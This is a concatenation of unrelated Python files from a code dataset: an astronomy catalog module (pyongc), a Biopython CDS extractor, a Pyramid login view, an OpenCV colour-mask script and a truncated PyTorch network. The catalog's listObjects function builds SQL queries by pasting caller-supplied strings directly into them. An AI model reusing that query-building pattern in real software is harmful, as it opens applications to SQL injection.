db.close()\n\n\ndef _str_to_coords(text):\n    \"\"\"Convert a string to coordinates\n\n    :param string text: a string expressing coordinates in the form\n        \"HH:MM:SS.ss +/-DD:MM:SS.s\"\n    :returns: array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n    \"\"\"\n    pattern = re.compile(r'^(?:(\\d{1,2}):(\\d{1,2}):(\\d{1,2}(?:\\.\\d{1,2})?))\\s'\n                         r'(?:([+-]\\d{1,2}):(\\d{1,2}):(\\d{1,2}(?:\\.\\d{1,2})?))$')\n    result = pattern.match(text)\n\n    if result:\n        return np.array([np.array([float(x) for x in result.groups()[0:3]]),\n                         np.array([float(x) for x in result.groups()[3:6]])\n                         ])\n    else:\n        raise ValueError('This text cannot be recognized as coordinates: ' + text)\n\n\ndef getNeighbors(obj, separation, catalog=\"all\"):\n    \"\"\"Find all neighbors of an object within a user selected range.\n\n    :param object: a Dso object or a string which identifies the object\n    :param float separation: maximum distance from the object expressed in arcmin\n    :param optional string catalog: filter for \"NGC\" or \"IC\" objects - default is all\n    :returns: list of Dso objects within limits ordered by distance [(Dso, separation),]\n\n    This function is used to find all objects within a specified range from a given object.\n    It requires an object as the starting point of the search (either a string containing\n    the name or a Dso type) and a search radius expressed in arcmins.\n    The maximum allowed search radius is 600 arcmin (10 degrees).\n    It returns a list of tuples with the Dso objects found in range and their distances,\n    or an empty list if no object is found:\n\n    >>> s1 = Dso(\"ngc521\")\n    >>> getNeighbors(s1, 15) #doctest: +ELLIPSIS\n    [(<__main__.Dso object at 0x...>, 0.13726168561780452), \\\n(<__main__.Dso object at 0x...>, 0.24140243942744602)]\n\n    >>> getNeighbors(\"ngc521\", 1)\n    []\n\n    The optional \"catalog\" parameter can be used to filter the search to only NGC or IC objects:\n\n    >>> getNeighbors(\"ngc521\", 15, catalog=\"NGC\") #doctest: +ELLIPSIS\n    [(<__main__.Dso object at 0x...>, 0.24140243942744602)]\n\n    \"\"\"\n    if not isinstance(obj, Dso):\n        if isinstance(obj, str):\n            obj = Dso(obj)\n        else:\n            raise TypeError('Wrong type obj. Either a Dso or string type was expected.')\n    if not (isinstance(separation, int) or isinstance(separation, float)):\n        raise TypeError('Wrong type separation. Either an int or float type was expected.')\n    if separation > 600:\n        raise ValueError('The maximum search radius allowed is 10 degrees.')\n\n    cols = 'objects.name'\n    tables = 'objects'\n    params = 'type != \"Dup\" AND name !=\"{}\"'.format(obj.getName())\n    if catalog.upper() in [\"NGC\", \"IC\"]:\n        params += ' AND name LIKE \"{}%\"'.format(catalog.upper())\n\n    objCoords = obj.getCoords()\n    params += _limiting_coords(objCoords, np.ceil(separation / 60))\n\n    neighbors = []\n    for item in _queryFetchMany(cols, tables, params):\n        possibleNeighbor = Dso(item[0])\n        distance = getSeparation(obj, possibleNeighbor)[0]\n        if distance <= (separation / 60):\n            neighbors.append((possibleNeighbor, distance))\n\n    return sorted(neighbors, key=lambda neighbor: neighbor[1])\n\n\ndef getSeparation(obj1, obj2, style=\"raw\"):\n    \"\"\"Finds the apparent angular separation between two objects.\n\n    :param obj1: first Dso object or string identifier\n    :param obj2: second Dso object or string identifier\n    :param opt string style: use \"text\" to return a string with degrees, minutes and seconds\n    :returns: if style=\"raw\": (float: angular separation, float: difference in A.R.,\n        float: difference in Dec)\n    :returns: if style=\"text\": 'DD° MMm SS.SSs'\n\n    This function will compute the apparent angular separation between two objects,\n    either identified with their names as strings or directly as Dso type.\n    By default it returns a tuple containing the angular separation and the differences in A.R.\n    and Declination expressed in degrees:\n\n    >>> s1 = Dso(\"ngc1\")\n    >>> s2 = Dso(\"ngc2\")\n    >>> getSeparation(s1, s2)\n    (0.03008927371519897, 0.005291666666666788, -0.02972222222221896)\n\n    >>> getSeparation(\"ngc1\", \"ngc2\")\n    (0.03008927371519897, 0.005291666666666788, -0.02972222222221896)\n\n    With the optional parameter \"style\" set to \"text\", it returns a formatted string:\n\n    >>> getSeparation(\"ngc1\", \"ngc2\", style=\"text\")\n    '0° 1m 48.32s'\n\n    If one of the objects is not found in the database it raises a ValueError:\n\n    >>> getSeparation(\"ngc1a\", \"ngc2\")\n    Traceback (most recent call last):\n    ...\n    ValueError: Object named NGC0001A not found in the database.\n\n    \"\"\"\n    if not isinstance(obj1, Dso):\n        if isinstance(obj1, str):\n            obj1 = Dso(obj1)\n        else:\n            raise TypeError('Wrong type obj1. Either a Dso or string type was expected.')\n    if not isinstance(obj2, Dso):\n        if isinstance(obj2, str):\n            obj2 = Dso(obj2)\n        else:\n            raise TypeError('Wrong type obj2. Either a Dso or string type was expected.')\n\n    coordsObj1 = obj1.getCoords()\n    coordsObj2 = obj2.getCoords()\n\n    separation = _distance(coordsObj1, coordsObj2)\n\n    if style == \"text\":\n        d = int(separation[0])\n        md = abs(separation[0] - d) * 60\n        m = int(md)\n        s = (md - m) * 60\n        return str(d) + \"° \" + str(m) + \"m \" + \"{:.2f}\".format(s) + \"s\"\n    else:\n        return separation\n\n\ndef listObjects(**kwargs):\n    \"\"\"Query the database for DSObjects with specific parameters.\n\n    :param optional string catalog: filter for catalog. [NGC|IC|M]\n    :param optional string type: filter for object type. See OpenNGC types list.\n    :param optional string constellation: filter for constellation\n        (three letter latin form - e.g. 
\"And\")\n :param optional float minsize: filter for objects with MajAx >= minSize(arcmin)\n :param optional float maxsize: filter for objects with MajAx < maxSize(arcmin)\n OR MajAx not available\n :param optional float uptobmag: filter for objects with B-Mag brighter than value\n :param optional float uptovmag: filter for objects with V-Mag brighter than value\n :param optional bool withname: filter for objects with common names\n :returns: [Dso,]\n\n This function returns a list of all DSObjects that match user defined parameters.\n If no argument is passed to the function, it returns all the objects from the database:\n\n >>> objectList = listObjects()\n >>> len(objectList)\n 13954\n\n Filters are combined with \"AND\" in the query; only one value for filter is allowed:\n\n >>> objectList = listObjects(catalog=\"NGC\", constellation=\"Boo\")\n >>> len(objectList)\n 281\n\n Duplicated objects are not resolved to main objects:\n\n >>> objectList = listObjects(type=\"Dup\")\n >>> print(objectList[0])\n IC0011, Duplicated record in Cas\n\n The maxSize filter will include objects with no size recorded in database:\n\n >>> objectList = listObjects(maxsize=0)\n >>> len(objectList)\n 2015\n\n \"\"\"\n available_filters = ['catalog',\n 'type',\n 'constellation',\n 'minsize',\n 'maxsize',\n 'uptobmag',\n 'uptovmag',\n 'withname']\n cols = 'objects.name'\n tables = 'objects'\n\n if kwargs == {}:\n params = '1'\n return [Dso(str(item[0]), True) for item in _queryFetchMany(cols, tables, params)]\n for element in kwargs:\n if element not in available_filters:\n raise ValueError(\"Wrong filter name.\")\n\n paramslist = []\n if \"catalog\" in kwargs:\n if kwargs[\"catalog\"].upper() == \"NGC\" or kwargs[\"catalog\"].upper() == \"IC\":\n paramslist.append('name LIKE \"' + kwargs[\"catalog\"].upper() + '%\"')\n elif kwargs[\"catalog\"].upper() == \"M\":\n paramslist.append('messier != \"\"')\n else:\n raise ValueError('Wrong value for catalog filter. [NGC|IC|M]')\n if \"type\" in kwargs:\n paramslist.append('type = \"' + kwargs[\"type\"] + '\"')\n if \"constellation\" in kwargs:\n paramslist.append('const = \"' + kwargs[\"constellation\"].capitalize() + '\"')\n if \"minsize\" in kwargs:\n paramslist.append('majax >= ' + str(kwargs[\"minsize\"]))\n if \"maxsize\" in kwargs:\n paramslist.append('(majax < ' + str(kwargs[\"maxsize\"]) + ' OR majax is NULL)')\n if \"uptobmag\" in kwargs:\n paramslist.append('bmag <= ' + str(kwargs[\"uptobmag\"]))\n if \"uptovmag\" in kwargs:\n paramslist.append('vmag <= ' + str(kwargs[\"uptovmag\"]))\n if \"withname\" in kwargs and kwargs[\"withname\"] is True:\n paramslist.append('commonnames != \"\"')\n elif \"withname\" in kwargs and kwargs[\"withname\"] is False:\n paramslist.append('commonnames = \"\"')\n\n params = \" AND \".join(paramslist)\n return [Dso(item[0], True) for item in _queryFetchMany(cols, tables, params)]\n\n\ndef nearby(coords_string, separation=60, catalog=\"all\"):\n \"\"\"Search for objects around given coordinates.\n\n :param string coords: A.R. 
and Dec of the center of search\n :param float separation: search radius expressed in arcmin - default 60\n :param optional string catalog: filter for \"NGC\" or \"IC\" objects - default is all\n :returns: list of Dso objects within limits ordered by distance [(Dso, separation),]\n\n Returns all objects around a point expressed by the coords parameter and within a search\n radius expressed by the separation parameter.\n Coordinates must be Right Ascension and Declination expressed as a string in the\n form \"HH:MM:SS.ss +/-DD:MM:SS.s\".\n\n The maximum allowed search radius is 600 arcmin (10 degrees) and default value is 60.\n\n It returns a list of of tuples with the Dso objects found in range and its distance,\n or an empty list if no object is found:\n\n >>> nearby('11:08:44 -00:09:01.3') #doctest: +ELLIPSIS\n [(<__main__.Dso object at 0x...>, 0.1799936868460791), \\\n(<__main__.Dso object at 0x...>, 0.7398295985600021), \\\n(<__main__.Dso object at 0x...>, 0.9810037613087355)]\n\n The optional \"catalog\" parameter can be used to filter the search to only NGC or IC objects:\n\n >>> nearby('11:08:44 -00:09:01.3', separation=60, catalog='NGC') #doctest: +ELLIPSIS\n [(<__main__.Dso object at 0x...>, 0.7398295985600021)]\n \"\"\"\n if separation > 600:\n raise ValueError('The maximum search radius allowed is 10 degrees.')\n\n coords = _str_to_coords(coords_string)\n\n cols = 'objects.name'\n tables = 'objects'\n params = 'type != \"Dup\"'\n if catalog.upper() in [\"NGC\", \"IC\"]:\n params += ' AND name LIKE \"{}%\"'.format(catalog.upper())\n\n params += _limiting_coords(coords, np.ceil(separation / 60))\n\n neighbors = []\n for item in _queryFetchMany(cols, tables, params):\n possibleNeighbor = Dso(item[0])\n distance = _distance(coords, possibleNeighbor.getCoords())[0]\n if distance <= (separation / 60):\n neighbors.append((possibleNeighbor, distance))\n\n return sorted(neighbors, key=lambda neighbor: neighbor[1])\n\n\ndef printDetails(dso):\n \"\"\"Prints a detailed description of the object in a formatted output.\n\n :param dso: a Dso object or a string with the NGC/IC identifier\n :returns: string\n\n This function returns a string with all the available details of the object,\n formatted in a way to fit a 80cols display.\n The object can be identified by its name as a string or by a Dso type:\n\n >>> print(printDetails(\"ngc1\"))\n +-----------------------------------------------------------------------------+\n | Id: 5612 Name: NGC0001 Type: Galaxy |\n | R.A.: 00:07:15.84 Dec.: +27:42:29.1 Constellation: Peg |\n +-----------------------------------------------------------------------------+\n | Major axis: 1.57' Minor axis: 1.07' Position angle: 112° |\n | B-mag: 13.4 V-mag: N/A J-mag: 10.78 H-mag: 10.02 K-mag: 9.76 |\n | |\n | Surface brightness: 23.13 Hubble classification: Sb |\n +-----------------------------------------------------------------------------+\n | Other identifiers: |\n | 2MASX J00071582+2742291, IRAS 00047+2725, MCG +04-01-025, PGC 000564, |\n | UGC 00057 |\n +-----------------------------------------------------------------------------+\n \n\n If the object is not found in the database it returns a ValueError:\n\n >>> printDetails(\"ngc1a\")\n Traceback (most recent call last):\n ...\n ValueError: Object named NGC0001A not found in the database.\n\n \"\"\"\n def _justifyText(text):\n \"\"\"Prints the text on multiple lines if length is more than 73 chars.\n\n :param string text: text to be printed\n \"\"\"\n text_returned = ''\n chunks = text.split()\n line = 
[]\n lineLength = 0\n for chunk in chunks:\n lineLength += len(chunk) + 1\n if lineLength <= 73:\n line.append(chunk)\n continue\n else:\n text_returned += ('{:5}{:73}{}'.format(\"|\", \" \".join(line), \"|\\n\"))\n del line[:]\n line.append(chunk)\n lineLength = len(chunk) + 1\n text_returned += ('{:5}{:73}{}'.format(\"|\", \" \".join(line), \"|\\n\"))\n return text_returned\n\n if not isinstance(dso, Dso):\n if isinstance(dso, str):\n dso = Dso(dso)\n else:\n raise TypeError('Wrong type as parameter. Either a Dso or string type was expected.')\n\n objType = dso.getType()\n separator = (\"+\" + \"-\" * 77 + \"+\\n\")\n obj_string = separator\n obj_string += ('{:2}{:14}{:24}{:38}{}'.format(\n \"|\",\n \"Id: \" + str(dso.getId()),\n \"Name: \" + dso.getName(),\n \"Type: \" + objType,\n \"|\\n\"))\n obj_string += ('{:2}{:23}{:23}{:30}{}'.format(\n \"|\",\n \"R.A.: \" + dso.getRA(),\n \"Dec.: \" + dso.getDec(),\n \"Constellation: \" + dso.getConstellation(),\n \"|\\n\"))\n\n identifiers = dso.getIdentifiers()\n if (identifiers[0] is not None or\n identifiers[1] is not None or\n identifiers[2] is not None):\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Also known as: \", \"|\\n\"))\n knownAs = []\n if identifiers[0] is not None:\n knownAs.append(identifiers[0])\n if identifiers[1] is not None:\n knownAs.extend(identifiers[1])\n if identifiers[2] is not None:\n knownAs.extend(identifiers[2])\n obj_string += _justifyText(\", \".join(knownAs))\n\n if identifiers[3] is not None:\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Common names: \", \"|\\n\"))\n obj_string += _justifyText(\", \".join(identifiers[3]))\n obj_string += separator\n\n dimensions = []\n for i in range(0, 2):\n if dso.getDimensions()[i] is None:\n dimensions.append(\"N/A\")\n else:\n dimensions.append(str(dso.getDimensions()[i]) + \"'\")\n if dso.getDimensions()[2] is None:\n dimensions.append(\"N/A\")\n else:\n dimensions.append(str(dso.getDimensions()[2]) + \"°\")\n obj_string += ('{:2}{:23}{:23}{:30}{}'.format(\n \"|\",\n \"Major axis: \" + dimensions[0],\n \"Minor axis: \" + dimensions[1],\n \"Position angle: \" + dimensions[2],\n \"|\\n\"))\n\n magnitudes = []\n for bandValue in dso.getMagnitudes():\n if bandValue is None:\n magnitudes.append(\"N/A\")\n else:\n magnitudes.append(str(bandValue))\n obj_string += ('{:2}{:15}{:15}{:15}{:15}{:16}{}'.format(\n \"|\",\n \"B-mag: \" + magnitudes[0],\n \"V-mag: \" + magnitudes[1],\n \"J-mag: \" + magnitudes[2],\n \"H-mag: \" + magnitudes[3],\n \"K-mag: \" + magnitudes[4],\n \"|\\n\"))\n obj_string += (\"|\" + \" \" * 77 + \"|\\n\")\n\n if objType == \"Galaxy\":\n obj_string += ('{:2}{:30}{:46}{}'.format(\n \"|\",\n \"Surface brightness: \" + str(dso.getSurfaceBrightness()),\n \"Hubble classification: \" + dso.getHubble(),\n \"|\\n\"))\n\n if objType == \"Planetary Nebula\":\n centralStar = dso.getCStarData()\n if centralStar[0] is not None:\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Central star identifiers: \", \"|\\n\"))\n obj_string += ('{:5}{:73}{}'.format(\"|\", \", \".join(centralStar[0]), \"|\\n\"))\n obj_string += (\"|\" + \" \" * 77 + \"|\\n\")\n cStarMagnitudes = []\n for i in range(1, 4):\n if centralStar[i] is None:\n cStarMagnitudes.append(\"N/A\")\n else:\n cStarMagnitudes.append(str(centralStar[i]))\n obj_string += ('{:2}{:76}{}'.format(\"|\", \"Central star magnitudes: \", \"|\\n\"))\n obj_string += ('{:5}{:24}{:24}{:25}{}'.format(\n \"|\",\n \"U-mag: \" + cStarMagnitudes[0],\n \"B-mag: \" + cStarMagnitudes[1],\n \"V-mag: \" + cStarMagnitudes[2],\n \"|\\n\"))\n 
obj_string += separator\n\n    if identifiers[4] is not None:\n        obj_string += ('{:2}{:76}{}'.format(\"|\", \"Other identifiers: \", \"|\\n\"))\n        obj_string += _justifyText(\", \".join(identifiers[4]))\n        obj_string += separator\n\n    notes = dso.getNotes()\n    if notes[0] != \"\":\n        obj_string += ('{:2}{:76}{}'.format(\"|\", \"NED notes: \", \"|\\n\"))\n        obj_string += _justifyText(notes[0])\n        obj_string += separator\n\n    if notes[1] != \"\":\n        obj_string += ('{:2}{:76}{}'.format(\"|\", \"OpenNGC notes: \", \"|\\n\"))\n        obj_string += _justifyText(notes[1])\n        obj_string += separator\n    return obj_string\n\n\ndef searchAltId(name):\n    \"\"\"Search in the database using an alternative identifier.\n\n    :param string name: alternative identifier to search for\n    :returns: Dso object\n\n    This function searches the name passed as parameter in the \"alternative identifiers\" field\n    of the database.\n    Currently it supports searching for identifiers from these catalogs: LBN, Messier, MWSC,\n    PGC, UGC.\n    The function returns the Dso object that was found.\n\n    >>> searchAltId(\"pgc5\") #doctest: +ELLIPSIS\n    <__main__.Dso object at 0x...>\n\n    >>> searchAltId(\"pc5\")\n    Traceback (most recent call last):\n    ...\n    ValueError: Wrong object name. Search can be performed for Messier, PGC, LBN, \\\nMWSC or UGC catalogs.\n\n    If no object has been found, it returns a string:\n\n    >>> searchAltId(\"pgc555\")\n    'Object not found.'\n\n    \"\"\"\n    # Make sure user passed a string as parameter\n    if not isinstance(name, str):\n        raise TypeError('Wrong type as parameter. A string type was expected.')\n\n    # Extract catalog name and object number to make sure we search the name in correct form\n    nameParts = re.match(r'(LBN|M|MWSC|PGC|UGC)\\s?(\\d+)', name.upper())\n    if nameParts is None:\n        raise ValueError('Wrong object name. Search can be performed for Messier, '\n                         'PGC, LBN, MWSC or UGC catalogs.')\n\n    selectWhat = 'objects.name'\n    fromWhere = 'objects'\n    if nameParts[1] == 'M':\n        # M102 == M101\n        if nameParts[2] == \"102\":\n            constraint = 'messier=\"101\"'\n        else:\n            constraint = 'messier=\"' + \"{:0>3}\".format(nameParts[2]) + '\"'\n    elif nameParts[1] == 'PGC':  # 6 digits format\n        constraint = 'identifiers LIKE \"%PGC ' + \"{:0>6}\".format(nameParts[2]) + '%\"'\n    elif nameParts[1] == 'UGC':  # 5 digits format\n        constraint = 'identifiers LIKE \"%UGC ' + \"{:0>5}\".format(nameParts[2]) + '%\"'\n    elif nameParts[1] == 'MWSC':  # 4 digits format\n        constraint = 'identifiers LIKE \"%MWSC ' + \"{:0>4}\".format(nameParts[2]) + '%\"'\n    elif nameParts[1] == 'LBN':  # 3 digits format\n        constraint = 'identifiers LIKE \"%LBN ' + \"{:0>3}\".format(nameParts[2]) + '%\"'\n    objectData = _queryFetchOne(selectWhat, fromWhere, constraint)\n\n    if objectData is not None:\n        return Dso(objectData[0])\n    else:\n        return \"Object not found.\"\n\n\ndef stats():\n    \"\"\"Returns version and content statistics of the database.\n\n    :returns: (__version__, DBDATE, total objects, [(object type, count),])\n    \"\"\"\n    try:\n        db = sqlite3.connect('file:' + DBPATH + '?mode=ro', uri=True)\n    except sqlite3.Error:\n        raise OSError('There was a problem accessing database file at ' + DBPATH)\n\n    try:\n        cursor = db.cursor()\n\n        cursor.execute('SELECT objTypes.typedesc, count(*) '\n                       'FROM objects JOIN objTypes ON objects.type = objTypes.type '\n                       'GROUP BY objects.type')\n        typesStats = cursor.fetchall()\n    except Exception as err:\n        raise err\n    finally:\n        db.close()\n\n    totalObjects = sum(objType[1] for objType in typesStats)\n\n    return __version__, DBDATE, totalObjects, typesStats\n\n\nif __name__ == \"__main__\":\n    import doctest\n    doctest.testmod()\n","sub_path":"pyongc/ongc.py","file_name":"ongc.py","file_ext":"py","file_size_in_byte":46023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
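The _distance helper in the record above uses the haversine-style formula for better precision at small separations; here is a standalone check with sample coordinates in decimal degrees (values approximate the NGC1/NGC2 doctest pair):

```python
# Standalone check of the angular-separation formula used by _distance.
import numpy as np

def separation_deg(ra1, dec1, ra2, dec2):
    """All inputs and the result are in decimal degrees."""
    a1, d1, a2, d2 = np.radians([ra1, dec1, ra2, dec2])
    return np.degrees(2 * np.arcsin(np.sqrt(
        np.sin((d2 - d1) / 2) ** 2 +
        np.cos(d1) * np.cos(d2) * np.sin((a2 - a1) / 2) ** 2)))

# approx. NGC1 vs NGC2 coordinates; cf. the getSeparation doctest (~0.0301 deg)
print(round(separation_deg(1.8160, 27.7081, 1.8213, 27.6784), 4))
```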
+{"seq_id":"202896458","text":"# @File : NumberWriter.py\n# @Time : 2019/08/24 16:57:51\n# @Author : Wei Luo \n# @Version : 1.0\n# @Contact : luoweihoo@yahoo.com\n# @Desc : None\n\nimport json\n\nnumbers = [2, 3, 5, 7, 11, 13]\n\nfilename = 'numbers.json'\nwith open(filename, 'w') as f:\n json.dump(numbers, f)\n ","sub_path":"Chapter10/NumberWriter.py","file_name":"NumberWriter.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
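The natural counterpart to the dump above is reading the list back; json.load restores it as Python objects:

```python
# Companion reader for the numbers.json file written above.
import json

with open('numbers.json') as f:
    numbers = json.load(f)
print(numbers)  # [2, 3, 5, 7, 11, 13]
```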
+{"seq_id":"646848257","text":"from Bio import Entrez\nfrom Bio import SeqIO\nEntrez.email = \"jcolgan@luc.edu\"\noutput = open(\"humanHerpesvirusCompleteSequence.txt\", 'a')\nhandle = Entrez.efetch(db=\"nucleotide\", id=\"EF999921\", rettype=\"gb\", retmode=\"text\")\nrecord = SeqIO.read(handle, \"genbank\")\ncount = 0\nfor feature in record.features:\n    if feature.type == \"CDS\":\n        count += 1\n        # use the protein_id qualifier as the FASTA header, falling back to a counter\n        feature_name = feature.qualifiers.get(\"protein_id\", [\"CDS_\" + str(count)])[0]\n        feature_seq = feature.extract(record.seq)\n        # Simple FASTA output without line wrapping:\n        output.write(\">\" + feature_name + \"\\n\" + str(feature_seq) + \"\\n\")\noutput.close()\noutput = open(\"miniProjectLog\", 'a')\noutput.write('The HCMV genome (EF999921) has ' + str(count) + ' CDS.')\noutput.close()\n","sub_path":"SeqGetter.py","file_name":"SeqGetter.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
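Instead of hand-writing FASTA lines, Biopython can format and line-wrap the output itself; a sketch that wraps each CDS in a SeqRecord and delegates to SeqIO.write (using the protein_id qualifier as the header is an assumption):

```python
# Sketch: write every CDS of a GenBank record as properly wrapped FASTA.
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord

def write_cds_fasta(record, path):
    cds = [SeqRecord(f.extract(record.seq),
                     id=f.qualifiers.get("protein_id", ["unknown_CDS"])[0],
                     description="")
           for f in record.features if f.type == "CDS"]
    SeqIO.write(cds, path, "fasta")  # handles headers and 60-char line wrapping
    return len(cds)
```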
+{"seq_id":"632712406","text":"import os\n\nfrom mako.template import Template\n\nfrom pyramid.renderers import render\nfrom pyramid.response import Response, FileResponse\n\nfrom pyramid.path import AssetResolver\n\nfrom pyramid.httpexceptions import HTTPNotFound\nfrom pyramid.httpexceptions import HTTPFound\n\nfrom pyramid.security import remember, forget\nfrom pyramid.security import authenticated_userid\n\nfrom trumpet.managers.admin.sitewebview import SiteWebviewManager\nfrom trumpet.managers.admin.sitewebview import SiteAppManager\n\nfrom trumpet.views.base import BasicView, static_asset_response\nfrom trumpet.views.schema import LoginSchema\nfrom trumpet.views.login import check_login_form\n\n\nclass FrontDoorView(BasicView):\n    def __init__(self, request):\n        super(FrontDoorView, self).__init__(request)\n        if request.method == 'POST':\n            self.handle_post()\n        else:\n            self.handle_get()\n\n    def handle_get(self):\n        request = self.request\n        view = request.view_name\n        subpath = request.subpath\n        if not view:\n            route = self.request.matched_route.name\n            if route == 'home':\n                self.response = HTTPFound('/frontdoor')\n                return\n            raise HTTPNotFound()\n        elif view in ['login', 'logout']:\n            # Note: handling logout on a GET request breaks the rule that GET has no side effects\n            if view == 'logout':\n                return self.handle_logout({})\n            self.response = HTTPFound('/frontdoor')\n            return\n        elif view == 'frontdoor':\n            if not len(subpath):\n                template = 'trumpet:templates/webview-app.mako'\n                settings = self.get_app_settings()\n                basecolor = settings['default.css.basecolor']\n                env = dict(appname='frontdoor', basecolor=basecolor)\n                content = render(template, env)\n                self.response = Response(body=content)\n                self.response.encode_content()\n            else:\n                assetpath = 'trumpet:static/apps/frontdoor'\n                asset = os.path.join(assetpath, *subpath)\n                self.response = static_asset_response(request, asset)\n        else:\n            self.response = HTTPNotFound()\n\n    def handle_login(self, post):\n        if check_login_form(self.request):\n            username = post['username']\n            headers = remember(self.request, username)\n            # the remember() headers must be set on the response, or the login cookie is lost\n            self.response = HTTPFound('/frontdoor', headers=headers)\n\n    def handle_logout(self, post):\n        headers = forget(self.request)\n        if 'user' in self.request.session:\n            del self.request.session['user']\n        while self.request.session.keys():\n            key = list(self.request.session.keys())[0]\n            del self.request.session[key]\n        location = self.request.route_url('home')\n        self.response = HTTPFound(location=location, headers=headers)\n\n    def handle_post(self):\n        request = self.request\n        view = request.view_name\n        subpath = request.subpath\n        post = request.POST\n        if view == 'login':\n            return self.handle_login(post)\n        elif view == 'logout':\n            return self.handle_logout(post)\n        else:\n            return self.handle_login(post)\n","sub_path":"trumpet/views/frontdoor.py","file_name":"frontdoor.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"493383765","text":"# rgb.py\n# The first parameter is the original image,\n# kernel is the matrix with which the image is\n# convolved, and the third parameter is the number\n# of iterations, which determines how much\n# you want to erode/dilate a given image.\nimport cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\n\nwhile(1):\n    # Take each frame\n    _, frame = cap.read()\n\n    # Convert BGR to HSV\n    hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n    # define range of blue color in HSV\n    lower_blue = np.array([110,50,50])\n    upper_blue = np.array([130,255,255])\n\n    # define range of red color in HSV\n    lower_red = np.array([161,155,84])\n    upper_red = np.array([179,255,255])\n\n    # define range of green color in HSV\n    lower_green = np.array([40,40,40])\n    upper_green = np.array([70,255,255])\n\n    # Threshold the HSV image to get only the target colors\n    mask = cv2.inRange(hsv, lower_blue, upper_blue)\n    mask_red = cv2.inRange(hsv, lower_red, upper_red)\n    mask_green = cv2.inRange(hsv, lower_green, upper_green)\n\n    # Bitwise-AND mask and original image\n    res_red = cv2.bitwise_and(frame, frame, mask=mask_red)\n    res_green = cv2.bitwise_and(frame, frame, mask=mask_green)\n    res = cv2.bitwise_and(frame, frame, mask=mask)\n\n    kernel = np.ones((3,3), np.uint8)  # Taking a 3x3 matrix as the kernel\n\n    img_erosion_blue = cv2.erode(res, kernel, iterations=2)\n    img_dilation_blue = cv2.dilate(img_erosion_blue, kernel, iterations=2)\n\n    img_erosion_red = cv2.erode(res_red, kernel, iterations=2)\n    img_dilation_red = cv2.dilate(img_erosion_red, kernel, iterations=2)\n\n    img_erosion_green = cv2.erode(res_green, kernel, iterations=2)\n    img_dilation_green = cv2.dilate(img_erosion_green, kernel, iterations=2)\n\n    cv2.imshow('Original', frame)\n\n    cv2.imshow('Blue', res)\n    cv2.imshow('Red', res_red)\n    cv2.imshow('Green', res_green)\n\n    cv2.imshow('Mask Blue', mask)\n    cv2.imshow('Mask Red', mask_red)\n    cv2.imshow('Mask Green', mask_green)\n\n    cv2.imshow('Erosion_RED', img_erosion_red)\n    cv2.imshow('Dilation_RED', img_dilation_red)\n    cv2.imshow('Erosion_BLUE', img_erosion_blue)\n    cv2.imshow('Dilation_BLUE', img_dilation_blue)\n    cv2.imshow('Erosion_GREEN', img_erosion_green)\n    cv2.imshow('Dilation_GREEN', img_dilation_green)\n\n    k = cv2.waitKey(5) & 0xFF\n    if k == 27:\n        break\n\ncv2.destroyAllWindows()\n","sub_path":"rgb.py","file_name":"rgb.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
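A handy way to derive HSV bounds like the hard-coded ones above is to convert a single sample pixel and pad around its hue; the sample color and padding are illustrative. Note OpenCV hue runs 0-179, so red wraps around and may need a second band like the 161-179 one used above:

```python
# Derive an HSV range from a sample BGR color.
import cv2
import numpy as np

sample_bgr = np.uint8([[[0, 0, 255]]])                 # pure red, as a 1x1 image
hue = int(cv2.cvtColor(sample_bgr, cv2.COLOR_BGR2HSV)[0][0][0])
lower = np.array([max(hue - 10, 0), 100, 100])
upper = np.array([min(hue + 10, 179), 255, 255])
print(hue, lower, upper)                               # 0 [0 100 100] [10 255 255]
```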
+{"seq_id":"266453288","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : EDenseNet.py\n@Contact : lihuichen@stu.scu.edu.cn\n@License : None\n\n@Modify Time @Author @Version @Desciption\n------------ ------- -------- -----------\n20-5-1 上午11:02 LihuiChen improve 1 None\n'''\n\n\nimport torch\nimport torch.nn as nn\n\n\nclass one_conv(nn.Module):\n def __init__(self, input_feature, compress):\n super(one_conv, self).__init__()\n ## todo: the affection of LCL\n self.compress = nn.Conv2d(in_channels = input_feature, out_channels = compress, kernel_size=1, stride=1, padding=0)\n self.explore = nn.Sequential(\n nn.Conv2d(in_channels=input_feature, out_channels=input_feature - compress, kernel_size=3, stride=1, padding=1),\n nn.ReLU(),\n )\n\n def forward(self, x):\n out = self.compress(x)\n media = self.explore(x)\n out = torch.cat([out,media],dim = 1)\n return out\n\nclass blocks(nn.Module):\n def __init__(self, input_feature, compress, layers):\n super(blocks, self).__init__()\n self.layers = layers\n self.blocks = nn.ModuleList()\n for i in range(self.layers):\n self.blocks.append(one_conv(input_feature, compress))\n self.localfusion = nn.Sequential(\n nn.ReLU(),\n nn.Conv2d(in_channels=input_feature, out_channels=input_feature, kernel_size=1, stride=1)\n )\n\n def forward(self, x):\n out = x\n for i in range(self.layers):\n out = self.blocks[i](out)\n out = self.localfusion(out)\n return out+x\n\n\nclass Down(nn.Module):\n def __init__(self, scale, input_feature, output_feature):\n super(Down, self).__init__()\n if scale == 2 :\n self.down = nn.Sequential(\n nn.ReLU(),\n nn.Conv2d(in_channels=input_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True)\n )\n if scale == 3:\n self.down = nn.Sequential(\n nn.ReLU(),\n nn.Conv2d(in_channels=input_feature, out_channels=output_feature, kernel_size=5, stride=3,\n padding=1, bias=True)\n )\n if scale == 4:\n self.down = nn.Sequential(\n nn.ReLU(),\n nn.Conv2d(in_channels=input_feature, out_channels=output_feature, kernel_size=4, stride=2,\n padding=1, bias=True),\n nn.ReLU(),\n 